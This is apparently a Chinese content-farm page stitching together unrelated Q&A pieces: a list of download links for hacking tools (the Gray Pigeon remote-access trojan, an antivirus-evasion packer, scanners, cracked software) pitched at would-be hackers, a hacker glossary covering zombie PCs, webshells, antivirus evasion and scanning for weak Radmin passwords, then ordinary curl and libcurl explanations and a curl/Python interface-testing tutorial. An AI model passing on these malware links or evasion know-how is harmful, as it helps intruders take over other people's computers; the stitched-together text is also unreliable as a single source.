4.7 想成為真正的黑客高手,那就先學會使用該工具吧! 下載 灰鴿子:http://61.129.76.80/down?cid=&t=502&fmt=- 阿D工具包: http://61.129.76.80/down?cid=&t=202&fmt=- ssport掃描:http://crc.onlinedown.net:82/down/ssport.rar NTscan:http://cqhk.14023.com/down/NTscan%BA%BA%BB%AF%B0%E6.rar IP資料庫純真版:http://www.xdowns.com/soft/xdowns.asp?softid=31375&downid=5&id=36514 Recton V2.5 D賀專用版:http://www.luyi61.net/Soft/UploadSoft/mmhm/200610/Recton.rar 區域網查看工具:http://flashget.newhua.com:82/down/LanSee163.rar 站長助手公開版:http://xzdx.hack58.net/hack58/ly/061229zs.rar 北斗4.1破解版:http://down.98959.com:90/%C8%ED%BC%FE%CF%C2%D4%D8/2006/8/25/20060825085921853.rar 木馬綵衣715SVK:http://download.77169.com/soft/hacrktools/keyboard/2006/mmcyzj.zip Private exe Protector:http://1.wt1.crsky.com/200703/pep200.rar

5. curl什麼意思

CURL是一個利用URL語法在命令行下工作的文件傳輸工具。

1997年首次發行。它支持文件上傳和下載,所以是綜合傳輸工具,但按傳統,習慣稱cURL為下載工具。cURL還包含了用於程序開發的libcurl。

工具簡介

cURL是一個利用URL語法在命令行下工作的文件傳輸工具,1997年首次發行。它支持文件上傳和下載,所以是綜合傳輸工具,但按傳統,習慣稱cURL為下載工具。cURL還包含了用於程序開發的libcurl。

cURL支持的通信協議有FTP、FTPS、HTTP、HTTPS、TFTP、SFTP、Gopher、SCP、Telnet、DICT、FILE、LDAP、LDAPS、IMAP、POP3、SMTP和RTSP。

curl還支持SSL認證、HTTP POST、HTTP PUT、FTP上傳, HTTP form based upload、proxies、HTTP/2、cookies、用戶名+密碼認證(Basic, Plain, Digest, CRAM-MD5, NTLM, Negotiate and Kerberos)、file transfer resume、proxy tunneling。

相關函數

PHP cURL 函數

PHP支持的由Daniel Stenberg創建的libcurl庫允許你與各種的伺服器使用各種類型的協議進行連接和通訊。libcurl支持http、https、ftp、gopher、telnet、dict、file和ldap協議。libcurl同時也支持HTTPS認證、HTTP POST、HTTP PUT、 FTP 上傳(這個也能通過PHP的FTP擴展完成)、HTTP 基於表單的上傳、代理、cookies和用戶名+密碼的認證。

6. 黑客基本術語

1,肉雞:所謂「肉雞」是一種很形象的比喻,比喻那些可以隨意被我們控制的電腦,對方可以是WINDOWS系統,也可以是UNIX/LINUX系統,可以是普通的個人電腦,也可以是大型的伺服器,我們可以象操作自己的電腦那樣來操作它們,而不被對方所發覺。
2,木馬:就是那些表面上偽裝成了正常的程序,但是當這些被程序運行時,就會獲取系統的整個控制許可權。有很多黑客就是 熱中與使用木馬程序來控制別人的電腦,比如灰鴿子,黑洞,PcShare等等。
3,網頁木馬:表面上偽裝成普通的網頁文件或是將而已的代碼直接插入到正常的網頁文件中,當有人訪問時,網頁木馬就會利用對方系統或者瀏覽器的漏洞自動將配置好的木馬的服務端下載到訪問者的電腦上來自動執行。
4,掛馬:就是在別人的網站文件裡面放入網頁木馬或者是將代碼潛入到對方正常的網頁文件里,以使瀏覽者中馬。
5,後門:這是一種形象的比喻,入侵者在利用某些方法成功的控制了目標主機後,可以在對方的系統中植入特定的程序,或者是修改某些設置。這些改動表面上是很難被察覺的,但是入侵者卻可以使用相應的程序或者方法來輕易的與這台電腦建立連接,重新控制這台電腦,就好象是入侵者偷偷的配了一把主人房間的要是,可以隨時進出而不被主人發現一樣。
通常大多數的特洛伊木馬(Trojan Horse)程序都可以被入侵者用語製作後門(BackDoor)
6,rootkit:rootkit是攻擊者用來隱藏自己的行蹤和保留root(根許可權,可以理解成WINDOWS下的system或者管理員許可權)訪問許可權的工具。通常,攻擊者通過遠程攻擊的方式獲得root訪問許可權,或者是先使用密碼猜解(破解)的方式獲得對系統的普通訪問許可權,進入系統後,再通過,對方系統內存在的安全漏洞獲得系統的root許可權。然後,攻擊者就會在對方的系統中安裝rootkit,以達到自己長久控制對方的目的,rootkit與我們前邊提到的木馬和後門很類似,但遠比它們要隱蔽,黑客守衛者就是很典型的rootkit,還有國內的ntroorkit等都是不錯的rootkit工具。
9,IPC$:是共享「命名管道」的資源,它是為了讓進程間通信而開放的餓命名管道,可以通過驗證用戶名和密碼獲得相應的許可權,在遠程管理計算機和查看計算機的共享資源時使用。
10.弱口令:指那些強度不夠,容易被猜解的,類似123,abc這樣的口令(密碼)
11.默認共享:默認共享是WINDOWS2000/XP/2003系統開啟共享服務時自動開啟所有硬碟的共享,因為加了"$"符號,所以看不到共享的托手圖表,也成為隱藏共享。
12.shell:指的是一種命令指行環境,比如我們按下鍵盤上的「開始鍵+R」時出現「運行」對話框,在裡面輸入「cmd」會出現一個用於執行命令的黑窗口,這個就是WINDOWS的Shell執行環境。通常我們使用遠程溢出程序成功溢出遠程電腦後得到的那個用於執行系統命令的環境就是對方的shell
13.webshell:webshell就是以asp、php、jsp或者cgi等網頁文件形式存在的一種命令執行環境,也可以將其稱做是一種網頁後門。黑客在入侵了一個網站後,通常會將這些asp或php後門文件與網站伺服器WEB目錄下正常的網頁文件混在一起,好後就可以使用瀏覽器來訪問這些asp 或者php後門,得到一個命令執行環境,以達到控制網站伺服器的目的。可以上傳下載文件,查看資料庫,執行任意程序命令等。國內常用的webshell有海陽ASP木馬,Phpspy,c99shell等
14.溢出:確切的講,應該是「緩沖區溢出」。簡單的解釋就是程序對接受的輸入數據沒有執行有效的檢測而導致錯誤,後果可能是造成程序崩潰或者是執行攻擊者的命令。大致可以分為兩類:(1)堆溢出(2)棧溢出。
15.注入:隨著B/S模式應用開發的發展,使用這種模式編寫程序的程序員越來越來越多,但是由於程序員的水平參差不齊相當大一部分應用程序存在安全隱患。用戶可以提交一段資料庫查詢代碼,根據程序返回的結果,獲得某些他想要知的數據,這個就是所謂的SQLinjection,即:SQL注意入。
16.注入點:是是可以實行注入的地方,通常是一個訪問資料庫的連接。根據注入點資料庫的運行帳號的許可權的不同,你所得到的許可權也不同。
17.內網:通俗的講就是區域網,比如網吧,校園網,公司內部網等都屬於此類。查看IP地址如果是在以下三個范圍之內的話,就說明我們是處於內網之中的:10.0.0.0—10.255.255.255,172.16.0.0—172.31.255.255,192.168.0.0—192.168.255.255
18.外網:直接連入INTERNET(互連網),可以與互連網上的任意一台電腦互相訪問,IP地址不是保留IP(內網)IP地址。
19.埠:(Port)相當於一種數據的傳輸通道。用於接受某些數據,然後傳輸給相應的服務,而電腦將這些數據處理後,再將相應的恢復通過開啟的埠傳給對方。一般每一個埠的開放的偶對應了相應的服務,要關閉這些埠只需要將對應的服務關閉就可以了。
20.3389、4899肉雞:3389是WINDWS終端服務(Terminal Services)所默認使用的埠號,該服務是微軟為了方便網路管理員遠程管理及維護伺服器而推出的,網路管理員可以使用遠程桌面連接到網路上任意一台開啟了終端服務的計算機上,成功登陸後就會象操作自己的電腦一樣來操作主機了。這和遠程式控制制軟體甚至是木馬程序實現的功能很相似,終端服務的連接非常穩定,而且任何殺毒軟體都不會查殺,所以也深受黑客喜愛。黑客在入侵了一台主機後,通常都會想辦法先添加一個屬於自己的後門帳號,然後再開啟對方的終端服務,這樣,自己就隨時可以使用終端服務來控制對方了,這樣的主機,通常就會被叫做3389肉雞。Radmin是一款非常優秀的遠程式控制制軟體,4899就是Radmin默認使以也經常被黑客當作木馬來使用(正是這個原因,目前的殺毒軟體也對Radmin查殺了)。有的人在使用的服務埠號。因為Radmin的控制功能非常強大,傳輸速度也比大多數木馬快,而且又不被殺毒軟體所查殺,所用Radmin管理遠程電腦時使用的是空口令或者是弱口令,黑客就可以使用一些軟體掃描網路上存在Radmin空口令或者弱口令的主機,然後就可以登陸上去遠程式控制制對惡劣,這樣被控制的主機通常就被成做4899肉雞。
21.免殺:就是通過加殼、加密、修改特徵碼、加花指令等等技術來修改程序,使其逃過殺毒軟體的查殺。
22.加殼:就是利用特殊的酸法,將EXE可執行程序或者DLL動態連接庫文件的編碼進行改變(比如實現壓縮、加密),以達到縮小文件體積或者加密程序編碼,甚至是躲過殺毒軟體查殺的目的。目前較常用的殼有UPX,ASPack、PePack、PECompact、UPack、免疫007、木馬綵衣等等。
23.花指令:就是幾句匯編指令,讓匯編語句進行一些跳轉,使得殺毒軟體不能正常的判斷病毒文件的構造。說通俗點就是」殺毒軟體是從頭到腳按順序來查找病毒。如果我們把病毒的頭和腳顛倒位置,殺毒軟體就找不到病毒了「。
先寫這么多吧,希望對哥們們有幫助了哈
「反彈埠」原理:
服務端(被控制端)主動連接客戶端(控制端),為了隱蔽起見,監聽埠一般開在80(提供HTTP服務的埠),這樣,即使用戶使用埠掃描軟體檢查自己的埠,也難以發現。而控制端發給服務端的數據是一個第三方的空間來實現的,一般用一個主頁空間,控制端通過FTP寫主頁空間上的一個文件,而服務端定期?*** TTP協議讀取這個文件的內容,當發現客戶端讓自己開始連接時,就主動連接。這樣,控制端就可以穿過防火牆,甚至還能訪問區域網內部的電腦。

軟體加殼:
「殼」是一段專門負責保護軟體不被非法修改或反編譯的程序。它們一般都是先於程序運行,拿到控制權,然後完成它們保護軟體的任務。經過加殼的軟體在跟蹤時已看到其真實的十六進制代碼,因此可以起到保護軟體的目的。

軟體脫殼:
顧名思義,就是利用相應的工具,把在軟體「外面」起保護作用的「殼」程序去除,還文件本來面目,這樣再修改文件內容就容易多了。

蠕蟲病毒:
它利用了WINDOWS系統的開放性特點,特別是COM到COM+的組件編程思路,一個腳本程序能調用功能更大的組件來完成自己的功能。以VB腳本病毒為例,它們都是把VBS腳本文件加在附件中,使用*.HTM,VBS等欺騙性的文件名。蠕蟲病毒的主要特性有:自我復制能力、很強的傳播性、潛伏性、特定的觸發性、很大的破壞性。

緩沖區溢出:
功擊者向一個地址區輸入這個區間存儲不下的大量字元。在某些性況下,這些多餘的字元可以作為「執行代碼」來運行,因此足以使功擊者不受安全措施限制地獲得計算機的控制權。

CMD:
是一個所謂命令行控制台。有兩條進入該程序的通道:第一、滑鼠點擊「開始—運行」,在出現的編輯框中鍵入「CMD」,然後點擊「確定」;第二、在啟動Windows2000的時候,按F8進入啟動選擇菜單,移動光條或鍵入數字至安全模式的命令行狀態。出現的窗口是一個在win9x系統常見的那種MSDOS方式的界面。盡管微軟把這個工具當做命令解釋器一個新的實例,但使用方法去和原來的DOS沒有區別。

嗅控器:
(Snifffer)就是能夠捕獲網路報文的設備。嗅控器的正當用處在於分析網路的流量,以便找出所關心的網路中潛在的問題。

密罐:(Honeypot)
是一個包含漏洞的系統,它摸擬一個或多個易受功擊的主機,給黑客提供一個容易功擊的目標。由於密罐沒有其它任務需要完成,因此所有連接的嘗試都應被視為是可疑的。密罐的另一個用途是拖延功擊者對其真正目標的功擊,讓功擊者在密罐上浪費時間。與此同時,最初的功擊目標受到了保護,真正有價值的內容光煥發不將受侵犯。

路由器(Routers):
是用來連接不同子網的中樞,它們工作於osi 7層模型的傳輸層和網路層。路由器的基本功能就是將網路信息包傳輸到它們的目的地。一些路由器還有訪問控制列表(ACLs),允許將不想要的信息包過濾出去。許多路由器都可以將它們的日誌信息注入到IDS系統中,提供有關被阻擋的訪問網路企圖的寶貴信息。

Unicode漏洞:

Unicode是一個16位的字元集,他可以移植到所有主要的計算機平台並且覆蓋幾乎整個世界。微軟IIS4和5都存在利用擴展Unicode字元取代「/」「\」而能利用「../」目錄便利的漏洞。未經授權的用戶可能利用IUSR_machinename帳號的上下文空間訪問任何已知的文件。該帳號在默認情況下屬於Everyone和Users組的成員,因此任何與Web根目錄在同一個邏輯驅動器上的能被這些用戶組訪問的文件都能被刪除、修改或執行,如同一個用戶成功的登陸所能完成的功能一樣!

CGI漏洞:

CGI是Common Gateway Inerface(公用網關介面)的簡稱,並不特指一種語言。Web伺服器的安全問題主要包括:1)Web伺服器軟體編制中的BUG;2)伺服器配置的錯誤。可能導致CGI源代碼泄漏,物理路徑信息泄漏,系統敏感信息泄漏或遠程執行任意命令。CGI語言漏洞分為以下幾類:配置錯誤、邊界條件錯誤、訪問驗證錯誤、來源驗證錯誤、輸入驗證錯誤、策略錯誤、使用錯誤等等。CGI漏洞大多分為一下幾種類型:暴露不該暴露的信息、執行不該執行的命令、溢出。

SSL漏洞:

SSL是Secure Socket Layer的縮寫。是網上傳輸信用卡和帳戶密碼等信息時廣泛採用的行業加密標准。SSL常見的安全漏洞有三種:1、攻擊證書,由於IIS伺服器提供「客戶端證書映射」功能,用於將客戶端提交證書中的名字映射到NT系統的用戶帳號,再這種情況下我們能夠獲得該主機的系統管理員許可權!如果黑客不能利用非法的證書突破伺服器,還可嘗試暴力攻擊。2、竊取證書,黑客還可能竊取有效的證書及相關的思友密匙。3、安全盲點。沒有網路檢測系統再加上沒有安全漏洞審查,使得最重要的伺服器反而成為受到最少防護的伺服器。

IPC$漏洞:

IPC$是共享「命名管道」的資源,它對於程序間的通訊十分重要。再遠程管理計算機和查看計算機的共享資源時使用。利用IPC我們可以與目標主機建立一個空的連接,而利用這個空連接,我們還可以得到目標主機上的用戶列表。但是,一些別有用心的人會利用IPC$,查找我們的用戶列表,並使用一些字典工具,對我們的主機進行入侵攻擊。

IIS漏洞:

IIS是Internet Information Service的縮寫。是微軟公司的Web伺服器。IIS支持多種需要伺服器端處理的文件類型,當一個WEB用戶從客戶端請求此類文件時,相應的DLL文件將自動對其進行處理。然而再ISM.DLL這個負責處理HTR文件的文件中被發現存在嚴重的安全漏洞。該漏洞包含了一個再ISM.DLL重未經驗證的緩沖,他可能對WEB伺服器的安全運作造成兩方面的威脅。首先,是來自服務拒絕攻擊的威脅,另一個威脅通過使用一個精心構建過的文件請求將可以利用標准緩存溢出手段導致2進制代碼再伺服器端運行,再這種情況下,什麼都可能發生!

NTLM驗證:

NTLM(NT LAN Mangager)是微軟公司開發的一種身份驗證機制,從NT4開始就以之使用,主要用於本地的帳號管理。

IPC管道:

為了更好的控制和處理不同進程之間的通信和數據交換,系統會通過一個特殊的連接管道來調度整個進程。

3389漏洞:

由於微軟的原因,使得安裝了微軟服務終端和全拼的Win2K伺服器存在著遠程登陸並能獲得超級用戶全縣的嚴重漏洞。

139漏洞:

通過139埠入侵是網路攻擊中常見的一種攻擊手段,一般情況下139埠開啟是由於NetBIOS網路協議的使用。NetBIOS就是網路基本輸入輸出系統,系統可以利用WINS服務、廣播及Lmhost文件等多種模式將NetBIOS名解析為相應的IP地址,從而實現信息通訊。再區域網內部使用NetBIOS協議可以非常方便的實現消息通信,但是如果再Internet上,NetBIOS就相當於一個後門程序,很多攻擊這都是通過NetBIOS漏洞發起攻擊的!

shell:

shell是系統與用戶的交換方式界面。簡單來說,就是系統與用戶「溝通」的環境。我們平時常用到的DOS,就是一個shell。(Windows2000是cmd.exe)

root:

Unix裡面最高許可權的用戶~即超級管理員

admin:

Windows NT裡面最高許可權的用戶~

rootshell:

通過溢出程序,再主機溢出一個具有root許可權的shell。(順便說一句,國內一知名黑客也叫這個名字)

IDS:

入侵檢測系統,用於在黑客發起進攻或是發起進攻之前檢測到攻擊,並加以攔截。IDS是不同於防火牆的,防火牆只能屏蔽入侵,而IDS卻可以在入侵發生以前,通過一些信息來檢測到即將發生的攻擊或是入侵以作出反應。

UDP:

一種傳輸層協議,在網路上不可靠的傳輸數據包,被DNS用於查詢和應答,許多流音頻和視頻應用也使用它。

API:

一套定義的一致性方法,軟體開發人員能用他來編寫與其他程序捷克歐的程序。API用於擴展程序的功能和使用預編寫的組創建新的程序。

FTP:

文件傳輸協議。一類應用以及該應用使用的協議的名字,用於將文件從一台計算機移動到另一台。

HTTP:

超文本傳輸協議。用於在萬維網上傳輸數據,包括超文本標識語言文檔、圖像、可執行內容等等。TCP承載HTTP,一般伺服器監聽埠80。

HTTPS:

安全超文本傳輸協議。通過在安全套接字層(SSL)協議上運行超文本傳輸協議來將安全添加到萬維網中。HTTPS能用於將WEB伺服器認證到客戶,將客戶認證到WEB伺服器和加密在兩個系統之間傳輸的所有數據,HTTPS伺服器一般監聽TCP埠443。

IRC:

Internet中繼交談,一系列程序和一種協議,用於實現在Internet上的交談會話。IRC特別受計算機地下組織的歡迎,北移些攻擊者用來討論他們的工具、技術和戰利品。

MAC Address:

網路介面的數據鏈路層(第二層)地址。對於乙太網卡,MAC地址維48bit長。

LAN:

區域網!一種網路,連接近距離的計算機,一般位於單個房間、建築物或小的地理區域里。LAN上的所有系統位於一個網路跳之間。

ping:

一類基於Internet控制消息協議的數據包,用於判斷網路上的某台計算機是否可以到達。

Proxy:

代理。一類程序或系統,接收來自客戶機算計的流量,並代表客戶與伺服器交互。代理能用於過濾應用級別的制定類型的流量或緩存信息以提高性能。許多防火牆依賴代理進行過濾。

telnet:

用於系統的遠程命令行訪問的程序和協議。telnet在TCP上傳輸,伺服器一般在TCP埠23監聽。

TCP:

傳輸控制協議。一種傳輸層協議,被許多要求數據的可靠傳輸的應用所使用。HTTP、SMTP、FTP和telnet都使用TCP進行傳輸。

TCP/IP:

整個網際協議族的集合名,包括TCP、UDP、IP和ICMP。

7. curl和libcurl的區別簡介

curl簡介
curl是利用URL語法在命令行方式下工作的開源文件傳輸工具。
它支持很多協議:DICT, FILE, FTP, FTPS, Gopher, HTTP, HTTPS, IMAP, IMAPS, LDAP,
LDAPS, POP3, POP3S, RTMP, RTSP, SCP, SFTP, SMTP, SMTPS, Telnet and TFTP。
curl同樣支持SSL證書,HTTP POST, HTTP
PUT,FTP上傳,基於表單的HTTP上傳,代理(proxies)、cookies、用戶名/密碼認證(Basic, Digest,
NTLM等)、下載文件斷點續傳,上載文件斷點續傳(file transfer resume),http代理伺服器管道(proxy
tunneling)以及其他特性。
curl是瑞典curl組織開發的,curl的官網是http://curl.haxx.se/,可以從官網獲取它的源代碼和相關說明。
libcurl簡介
libcurl為一個免費開源的,客戶端url傳輸庫,支持DICT, FILE, FTP, FTPS, Gopher, HTTP,
HTTPS, IMAP, IMAPS, LDAP, LDAPS, POP3, POP3S, RTMP, RTSP, SCP, SFTP,
SMTP, SMTPS, Telnet and TFTP等協議。
同curl一樣,libcurl也支持SSL證書,HTTP POST, HTTP
PUT,FTP上傳,基於表單的HTTP上傳,代理(proxies)、cookies、用戶名/密碼認證(Basic, Digest,
NTLM等)、下載文件斷點續傳,上載文件斷點續傳(file transfer resume),http代理伺服器管道(proxy
tunneling)等。
libcurl是高度可移植的,可以工作在不同的平台上,支持Windows,Unix,Linux等。
libcurl是免費的,線程安全的,IPV6兼容的,同事它還有很多其他非常豐富的特性。libcurl已經被很多知名的大企業以及應用程序所採用。
可以在這里獲取libcurl的源碼及相關文檔。
curl與libcurl對比
相同點
curl和libcurl都可以利用多種多樣的協議來傳輸文件,包括HTTP, HTTPS, FTP, FTPS, GOPHER, LDAP, DICT, TELNET and FILE等。
不同點
curl是命令行工具,可以通過shell或腳本來運行curl。curl底層所使用的庫是libcurl。
libcurl是一個庫,通常與別的程序綁定在一起使用,如命令行工具curl就是封裝了libcurl庫。所以我們也可以在你自己的程序或項目中使用libcurl以獲得類似CURL的強大功能。接下來將要介紹的PHP擴展就是對curl的一個封裝。

8. http請求在何種情況下會返回409

不能自動的,應用程序提供了介面讓你設置 http 狀態碼和具體的消息。 以 php 為例:

header('HTTP/1.1 409 Conflict', true, 409);

也可以:int http_response_code ([ int $response_code ] ) (需要 php>=5.4)

9. PHP源碼解密

請務必試試.
網路一下:清風發明"空格"zend
不錯的話.給加個分吧.我沒半點分數了.

10. 如何利用cURL和python對服務端和web端進行介面測試

工具描述

cURL是利用URL語法在命令行方式下工作的文件傳輸工具,是開源愛好者編寫維護的免費工具,支持包括Windows、Linux、Mac等數十個操作系統,最新版本為7.27.0,但是我推薦大家使用7.26.0,從這里可以下載7.26.0版本。

以下是官方介紹的翻譯:
cURL是一個使用URL語法來傳輸數據的命令行工具,支持
DICT,FILE,FTP,FTPS,GOPHER,HTTP,HTTPS,IMAP,IMAPS,LDAP,LDAPS,POP3,POP3S,RTMP,RTSP,SCP,SFTP,SMTP,SMTPS,Telnet
和TFTP。 cURL支持SSL證書,HTTP POST,HTTP
PUT,FTP上傳,HTTP基礎表單上傳,代理,cookies,用戶+密碼身份驗證(Basic, Digest, NTLM,
Negotiate, kerberos...),恢復文件傳輸,隧道代理等等。

Python是一種面向對象、直譯式計算機程序設計語言,由Guido van Rossum於1989年底發明,它的強大和易用就無需多做說明了,在web開發中或者對開發速度要求較高的開發中應用十分廣,不過因為屬於腳本類語言,它的性能始終比不上C++、C等語言。

本文主要利用實例說明這兩款工具的在測試中的部分用途,更多用法留待大家繼續探索。

應用場景

使用cURL模擬客戶端對服務端進行查詢

在進行介面測試時,應該先找開發人員提供介面列表和對應參數,這樣測試的時候就可以驗證測試方法是否正確,不過如果可以用瀏覽器模擬操作的話,也可以自己先試試的,後面的例子會提到。

首先使用客戶端訪問需要測試的服務端介面,用wireshark抓包結果如下:

把查詢字元串以multipart方式post數據到伺服器的file_health_info.php介面。

Tips:

Windows版的cURL不像Linux或者Mac一樣屬於系統自帶工具,需要下載,如果要在命令提示符下使用就需要跳轉到工具所在目錄下才能運
行,十分麻煩,我們可以直接把這個工具文件放到Windows目錄下,這樣無論在哪個目錄都可以直接使用「curl」命令運行工具了。

cURL默認就是以post方式發送數據的,所以只需要加入multipart方式就可以了,-F在cURL幫助中的解釋是:

-F, --form CONTENT Specify HTTP multipart POST data (H)

--form-string STRING Specify HTTP multipart POST data (H)

--ftp-account DATA Account data string (F)

--ftp-alternative-to-user COMMAND String to replace "USER [name]" (F)

--ftp-create-dirs Create the remote dirs if not present (F)

--ftp-method [MULTICWD/NOCWD/SINGLECWD] Control CWD usage (F)

--ftp-pasv Use PASV/EPSV instead of PORT (F)

Specify HTTP multipart POST data正好滿足我們的要求,所以模擬的語句是:

curl -F "newmd5=###25016566###d:\test.exe###1###" http://172.22.54.22/file_health_info.php

後面的都是參數,測試前就要找開發確認好。

不過因為服務端支持以gzip方式返回數據,所以我們還可以在請求中加入—compressed參數,即是:

curl --compressed -F "newmd5=###25016566###d:\test.exe###1###" http://172.22.54.22/file_health_info.php

為了更好判斷服務端介面是否正常,除了對返回數據進行判斷外,我們還需要對服務端返回的數據包頭進行解析,所以還可以在cURL請求中加入-i參數,最終這個測試語句就變為:

curl –i --compressed -F "newmd5=###25016566###d:\test.exe###1###" http://172.22.54.22/file_health_info.php

模擬完成後就要考慮判斷返回值的事了,我們首先在命令提示符下運行這個語句,看看返回值。

運行以上命令後,返回的數據如下:

HTTP/1.1 100 Continue

HTTP/1.1 200 OK

Date: Fri, 24 Aug 2012 07:47:45 GMT

Content-Type: application/xml

Transfer-Encoding: chunked

Connection: keep-alive

Server: 360 web server

Content-Encoding: gzip

<?xml version="1.0" encoding="GBK" ?>

<ret>

<retinfo code="0" msg="Operation success" total="1" success="1" empty="0"

cost="999.92752075195"/>

<softs>

<soft>

<md5></md5>

<sha1></sha1>

<level>4040</level>

<e_level>40.3</e_level>

<size></size>

<soft_name><![CDATA[]]> </soft_name>

<describ><![CDATA[]]></describ>

<file_desc><![CDATA[]]></file_desc>

<upload>0</upload>

<attr_upload>2</attr_upload>

<class><![CDATA[private]]></class>

<malware><![CDATA[cloud.virus]]></malware>

<is_sys_file>0</is_sys_file>

<is_rep>0</is_rep>

<age>0</age>

<pop>0</pop>

</soft>

</softs>

</ret>

數據包包頭是常見的,一般來說,我們只要判斷包頭中含有「HTTP/1.1 200
OK」就可以確定服務端正常返回了數據。另外從內容可以看到這是一個xml格式的數據包,我們只需要判斷是否存在關鍵的欄位即可,比
如<level>,確定這些之後我們就可以在python中添加如下案例代碼了:

首先運行指定的curl命令:

response = os.popen(『『『curl -i --compressed -F "newmd5=###25016566###d:\test.exe###1###" http://172.22.54.31/file_health_info.php

然後判斷返回值中是否存在我們想要的欄位:

self.assertNotEqual(response.find(『HTTP/1.1 200 OK『),-1)

self.assertNotEqual(response.find(『<level>『),-1)

上面的內容看起來差不多可以了,但實際還不夠嚴謹,因為服務端返回的這些數據是從資料庫中獲取的,所以我們還需要查詢資料庫獲取指定值,判斷是否和數據包中的一致,比如<level>:

首先使用python登錄資料庫伺服器:

conn = MySQLdb.connect(host=『172.22.54.31『, user=『user『,passwd=『test321『,db=『cloud『)

cursor = conn.cursor()

count = cursor.execute(『SELECT plevel FROM file where md5=""『)

result = cursor.fetchone()

然後判斷返回值中的level是否資料庫中的值:

self.assertNotEqual(response.find(『『『<level>%s</level>『『『%result[0]),-1)

測試時除了使用cURL等工具進行模擬,還可以自己用python或其他語言寫代碼進行post數據,不過當時簡單起見所以就選擇了用cURL測試。

使用cURL模擬控制台登錄

說到模擬登錄或者模擬點擊,很多同學可能直接聯想到QTP等模擬界面操作的工具,事實上這種工具有一個很大的弊端是太依賴控制項,如果界面控制項變了,
那麼可能整個腳本就無效了,現在的程序設計都傾向界面邏輯分離,這樣修改界面時就不會動到底下的功能介面,開發人員可以隨時修改界面控制項,如果還是採取
QTP等模擬點擊的方法測試,結果可能是事倍功半的,如果測試時直接點用介面就可以避免這種問題。

下面的例子是模擬控制台登錄的,登錄URL為:

http://172.22.54.31:8888/cloud/index.php?r=site/login ,首先使用瀏覽器登錄一次,看看實際效果如何。

Tips:

測試php或其他web程序時建議使用chrome,因為它自帶的Developer
Tools十分好用,當然firefox或者IE9也有類似的工具,看個人習慣吧。按F12打開工具,選擇Network標簽頁,然後輸入用戶名、密碼點
擊登錄,這時Network下方會顯示登錄過程中瀏覽器想控制台請求的所有數據,包括請求類型、表單數據等,這些是我們模擬操作的數據來源。

從上圖可以獲取幾個重點信息:請求URL、請求類型、數據類型、數據內容、並且支持gzip壓縮等。我們用curl模擬如下:

curl -i --compressed http://172.22.54.31:8888/cloud/index.php?r=site/login -d 「username=admin」 -d 「userpass=admin」

使用-i和—compressed的原因再上一個例子已經說了,這里不再贅述,重點是後面的-d,它在官方幫助的解釋是:

-d, --data DATA HTTP POST data (H)

--data-ascii DATA HTTP POST ASCII data (H)

--data-binary DATA HTTP POST binary data (H)

--data-urlencode DATA HTTP POST data url encoded (H)

--delegation STRING GSS-API delegation permission

--digest Use HTTP Digest Authentication (H)

--disable-eprt Inhibit using EPRT or LPRT (F)

--disable-epsv Inhibit using EPSV (F)

而我們從Developer Tools返回的數據已經知道,返回數據的格式是

「application/x-www-form-urlencoded」,所以很明顯需要使用-d的HTTP POST data url encoded特性。不過格式中還有關鍵字form,莫非也支持-F參數登錄,試試:

curl -i --compressed http://172.22.54.31:8888/cloud/index.php?r=site/login -F 「username=admin」 -F 「userpass=admin」,果然成功,呵呵~

也許有同學有疑問,為何不模擬warnsetup、refer,這是因為測試時發現登錄界面只需要用戶名和密碼就夠了,refer 用於記錄來源網頁,在這里用處不大,warnsetup只是用於驗證登錄碼的,這個已經去掉了。

接下來要驗證數據,我們在命令提示符中運行上面的命令,返回結果如下:

HTTP/1.1 302 Moved Temporarily

Date: Fri, 24 Aug 2012 08:29:07 GMT

Content-Type: text/html

Transfer-Encoding: chunked

Connection: keep-alive

X-Powered-By: PHP/5.4.3

Set-Cookie: PHPSESSID=; path=/

Expires: Thu, 19 Nov 1981 08:52:00 GMT

Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0

Pragma: no-cache

Set-Cookie: PHPSESSID=; path=/

Location: ./index.php

Server: 360 web server

很奇怪吧,乍一看控制台沒有返回任何有用信息,不過裡面那句HTTP/1.1 302 Moved
Temporarily是不是特別眼熟?這個特殊的302(表示http重定向)正是我們在Developer
Tools看到的狀態值,看到這個已經可以80%確定我們登錄已經成功了,更重要的是返回包中的內容:Location:
./index.php,這說明控制台已經通知請求端跳轉到index.php,如果登錄失敗控制台會繼續停留在當前登錄界面的,我們只需要修改curl
語句中的用戶名或者密碼就知道了,這種情況下返回包就是登錄界面的php源碼,這里不再贅述。

使用cURL以get方式測試控制台搜索介面

測試方法同上面差不多,首先使用chrome打開控制台進入對應頁面,在搜索框中輸入「test.exe」,點擊搜索,使用developer tools抓包,內容如下:

cURL模擬get方式發送數據的參數是-G,了解這個後面要模擬就很簡單了:

curl -i --compressed -G 「http://172.22.54.31:8888/cloud/index.php?r=file_cloud/api/search&filename=&bg=0&lm=19


其中每個參數的含義要分別了解:filename表示輸入的關鍵字,bg表示資料庫第一行,lm表示共顯示19行數據。這個介面返回的數據如下:

{"rows":[{"level":"10","plevel":"10","id":"20","md5":"","soft_name":"","soft_desc":"","file_desc":"","is_sys_file":"127","size":"41984","is_rep":"0","file_name":"apihex86.d

ll","file_version":"6.1.7600.16385","proct_version":"6.1.7600.16385","right":"\u00a9 Microsoft Corporation. All rights reserved.","lang":"0","org_name":"YXBpaGV4ODYuZGxs","sign_name":"TWljcm9zb2Z0IFdpbmRvd3M=","company_name":"Microsof

t Corporation","update_time":"2012-07-31 18:14:27","create_time":"2012-07-31 18:14:27","creator_mid":""}],"count":"1"}

分別是文件屬性和文件信息,這涉及到兩個資料庫表,所以驗證數據需要用python從兩張表中獲取對應信息。

從第一張表獲取文件屬性,比如只獲取plevel:

SELECT plevel FROM `file` where md5=""

從第二張表獲取文件信息,比如只獲取company_name:

SELECT company_name FROM file_info where md5=""

Python代碼如下:

conn = MySQLdb.connect(host=『%s『% self.host, user=『user『,passwd=『test321『,db=『cloud『)

cursor = conn.cursor()

count = cursor.execute(『SELECT plevel FROM `file` where md5=""『)

result = cursor.fetchone()

self.assertNotEqual(response.find(str(result[0])),-1)

count = cursor.execute(『SELECT company_name FROM file_info where md5=""『)

result1 = cursor.fetchone()

self.assertNotEqual(response.find(result1[0]),-1)

當然嚴謹的測試案例是每一個屬性欄位都需要進行查找和匹配,這里就不再贅述了。

閱讀全文

與phpntlm相關的資料

熱點內容
加密文檔繼承許可權 瀏覽:371
2000元招程序員 瀏覽:853
h3c交換機刪除命令 瀏覽:844
如何辦理移動精品app包 瀏覽:787
如何學好語文app初中 瀏覽:526
